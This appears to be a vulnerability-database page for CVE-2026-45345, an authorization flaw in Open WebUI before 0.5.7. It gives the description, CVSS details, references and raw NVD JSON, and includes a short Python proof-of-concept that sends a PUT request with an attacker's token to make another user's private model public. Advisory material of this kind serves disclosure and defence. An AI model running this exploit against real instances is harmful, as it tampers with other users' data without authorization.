CVE-2026-45345

Description

Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.5.7, a user can modify another user's model even if its visibility is set to Private. By changing the access permissions during editing, unauthorized access can be gained. This vulnerability is fixed in 0.5.7.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

No configuration data available.

Open WebUI < 0.5.7

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target URL and API endpoint
url = "http://target-open-webui-instance/api/models/{target_model_id}"

# Attacker's session cookie after login
cookies = {
    "access_token": "attacker_jwt_token"
}

# Payload to modify the model visibility
# Exploiting the lack of ownership check to change permissions
payload = {
    "name": "Target Model Name",
    "visibility": "public",  # Changing from private to public
    "description": "Modified by attacker"
}

try:
    response = requests.put(url, json=payload, cookies=cookies)
    if response.status_code == 200:
        print("[+] Exploit successful! Model permission modified.")
        print(response.json())
    else:
        print("[-] Exploit failed.")
        print(response.text)
except Exception as e:
    print(f"Error: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-45345
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-45345
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-45345/
[4] VulDB https://vuldb.com/cve/CVE-2026-45345
[5] https://github.com/open-webui/open-webui/security/advisories/GHSA-gm54-m39w-grjp

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-45345", "sourceIdentifier": "[email protected]", "published": "2026-05-15T22:16:54.923", "lastModified": "2026-05-15T22:16:54.923", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.5.7, a user can modify another user's model even if its visibility is set to Private. By changing the access permissions during editing, unauthorized access can be gained. This vulnerability is fixed in 0.5.7."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-285"}]}], "references": [{"url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-gm54-m39w-grjp", "source": "[email protected]"}]}}